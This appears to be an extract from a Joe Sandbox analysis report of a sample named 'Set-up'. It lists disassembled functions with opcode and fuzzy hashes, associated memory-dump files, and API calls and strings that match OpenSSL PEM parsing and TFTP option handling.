Opcode ID: 56210b18be2d5295b2228f04e8b3613daa21c23cf66af4aab3823133a7308595
Instruction ID: f2d8b819e0ae69cd5bedf84b9b6373c4121f14221a4bb3ae5f78295705572a00
Opcode Fuzzy Hash: 56210b18be2d5295b2228f04e8b3613daa21c23cf66af4aab3823133a7308595
Instruction Fuzzy Hash: 71F1A131C18BD596E7238B2CD8427EAF3A4BFE9354F049B1DEDC872511EB3152469382

Function 00F9C1A0 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c15bf4492048ef30b56e1a346c55a17110d8bb22e10997e2877f6a1a6628987
Instruction ID: b1d605dbf3d6db99092bab04989d34e6c33f0b8b239caddf4862bed5aa6b07ec
Opcode Fuzzy Hash: 8c15bf4492048ef30b56e1a346c55a17110d8bb22e10997e2877f6a1a6628987
Instruction Fuzzy Hash: 48E115729087818BD7158F38C4845AAFBE0AFDA354F58CB1DE8D863252D771E984D782

Function 00F426E0 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a0acc334861111d8bba626bddb6781e38ce2f4ca6c64d97bc48ddc04adb712
Instruction ID: eb994be3beca671880f63eb5e9fa0005e697f7801bc2c19405e7405f8fd9ee8a
Opcode Fuzzy Hash: f2a0acc334861111d8bba626bddb6781e38ce2f4ca6c64d97bc48ddc04adb712
Instruction Fuzzy Hash: 6BD167F3E2054457DB0CDE38CC213A82692EB94375F5E8338FB769A3C6E238D9548684

Function 00FDE2F0 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
Instruction ID: 7291b101d3ff11d2bdd456c24810f4d78e0c307fbc1152bc4f4867b933092b4b
Opcode Fuzzy Hash: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
Instruction Fuzzy Hash: 8BC1BB369097118BC714EF18C48026AFBE2FF84360F598A6EE8D59B351D335EC91DB82

Function 00D4C770 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
Instruction ID: da399f322d780a2ad27ed29a025d1f302b55e2d7ea89ca4a8317b39a9a998718
Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
Instruction Fuzzy Hash: BBA19435B111598FEB38DE29CC41FDA73E2EB98310F0A8525ED599F3D1EA30AD458790

Function 01000590 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890c3ba1810d69907324ce26629eff9f4e84be59e47a381da580c64c3a7c32b0
Instruction ID: 3945cc262115af33da0f0e49e970bf4767e54b784286b5bf6553c8b9cb6b3f0b
Opcode Fuzzy Hash: 890c3ba1810d69907324ce26629eff9f4e84be59e47a381da580c64c3a7c32b0
Instruction Fuzzy Hash: 73A1B1316083059BE709DE6DD8D062EBBE2BBC4250F548A3DF5DA873D5D674E940CB82

Function 00D4C320 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$CounterFrequency
String ID:
API String ID: 774501991-0
Opcode ID: 6a327f1c575adee8ea5b5f7a354e87dc93f99403ec0b9041a685b002c62a45dc
Instruction ID: 7238c46aeae29532e35d9cb827cb0b2caa97bfc361f9559e053fe539354eeb2f
Opcode Fuzzy Hash: 6a327f1c575adee8ea5b5f7a354e87dc93f99403ec0b9041a685b002c62a45dc
Instruction Fuzzy Hash: 71C10671915B418BD362CF38C881BEAF7E1BF99300F109A1DE9EEA6251EB707584CB51

Function 00FFA800 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction ID: e010d27f99bdd4d6e5e9a6eb1bebec1d1cd8b6a2f7d2efa9a3424e701183441f
Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction Fuzzy Hash: 5E71D0B150421A8BC7199F6CD1C0179FBE1BF88350F2A8B7DDA8987352D274EC95DB81

Function 00DF4170 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction ID: 279aaad3911c94cd91d53db87a612d3f07e2859c332479070315e6aa164cbfcb
Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction Fuzzy Hash: CA512672B093594BD7048E5C848027FB7D1FB9A324F2A877CD6DA8B352C224DC46C7A1

Function 00FFA610 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction ID: 1925a8494ba48c9c01ee2b4708fb092d864d7433a4df652bfca87ee5fead5bd2
Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction Fuzzy Hash: BE51BFB6A086298BC7189F19C1D0529FBE2BF88310F15C67DDA9D67751C330AD64DBC2

Function 0100A000 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction ID: 77f32a645a0eb5508bb74c6a867d4602fdec3f9f5235ea52c70fc872783f286b
Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction Fuzzy Hash: BA31B0317083198BE756ED6DC4C426EF6D29BC8360F59C63CE6C9C33C1EA719C498681

Function 00E784A0 Relevance: 60.4, APIs: 24, Strings: 16, Instructions: 382stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E785B6
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 00E785CC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 00E785E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 00E785F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 00E7860A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00E78620
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00E78634
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 00E7864A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 00E7865C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00E78672
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00E786A0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00E786BA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 00E786D0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00E786E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00E786FC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00E78712
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00E7872A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00E78686

Part of subcall function 00E5CBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E37254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00E340BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E5CBD2

Strings

PARAMETERS, xrefs: 00E785DC, 00E787FB
CERTIFICATE, xrefs: 00E7862E, 00E7866C
DH PARAMETERS, xrefs: 00E78604
NEW CERTIFICATE REQUEST, xrefs: 00E78644
crypto/pem/pem_lib.c, xrefs: 00E784F6, 00E78509, 00E7851F, 00E78545, 00E7855A, 00E78572, 00E788CE, 00E78935, 00E78948, 00E7895F, 00E78977, 00E7898C, 00E789A5, 00E789CB
ENCRYPTED PRIVATE KEY, xrefs: 00E78740
Expecting: , xrefs: 00E78908
CMS, xrefs: 00E786F6, 00E78724
PKCS7, xrefs: 00E786B4, 00E786DC, 00E7870C
PKCS #7 SIGNED DATA, xrefs: 00E786CA
TRUSTED CERTIFICATE, xrefs: 00E78680, 00E7869A
X509 CERTIFICATE, xrefs: 00E7861A
PRIVATE KEY, xrefs: 00E78756, 00E78787
X9.42 DH PARAMETERS, xrefs: 00E785F2
ANY PRIVATE KEY, xrefs: 00E785C6
CERTIFICATE REQUEST, xrefs: 00E78656

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcmp$free
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
API String ID: 3401341699-4246700284
Opcode ID: 8a6ea3e682687db988f5da875fe7589ad61eec56b59e7f4c27eca1ec7ba7bc66
Instruction ID: 692f762e99897cf8e3530e4ba5a150d3917a8c1eea1cd95c95b53348ffe513bd
Opcode Fuzzy Hash: 8a6ea3e682687db988f5da875fe7589ad61eec56b59e7f4c27eca1ec7ba7bc66
Instruction Fuzzy Hash: 11B128B1A9430266E71136216D47FAB32986F7078EF08943DFE58B12C2FFA1D609C163

Function 00CF2010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CF204A
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CF2068
WSAGetLastError.WS2_32 ref: 00CF20DE
recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 00CF214D
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00CF2365
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00CF238F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF23B9
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00CF241D
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00CF24AD

Strings

got option=(%s) value=(%s), xrefs: 00CF23E8
%s (%ld), xrefs: 00CF24D8, 00CF2557
requested, xrefs: 00CF232C
%s (%d) %s (%d), xrefs: 00CF2337
Received too short packet, xrefs: 00CF2169
Internal error: Unexpected packet, xrefs: 00CF22C4
TFTP error: %s, xrefs: 00CF228B
tsize, xrefs: 00CF248D
tsize parsed from OACK, xrefs: 00CF24D3
invalid tsize -:%s:- value in OACK packet, xrefs: 00CF2573
invalid blocksize value in OACK packet, xrefs: 00CF251F
blksize parsed from OACK, xrefs: 00CF2332
server requested blksize larger than allocated, xrefs: 00CF2552
%s (%d), xrefs: 00CF254A
blksize is larger than max supported, xrefs: 00CF253C
blksize, xrefs: 00CF23FC
Malformed ACK packet, rejecting, xrefs: 00CF2514
blksize is smaller than min supported, xrefs: 00CF2545

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
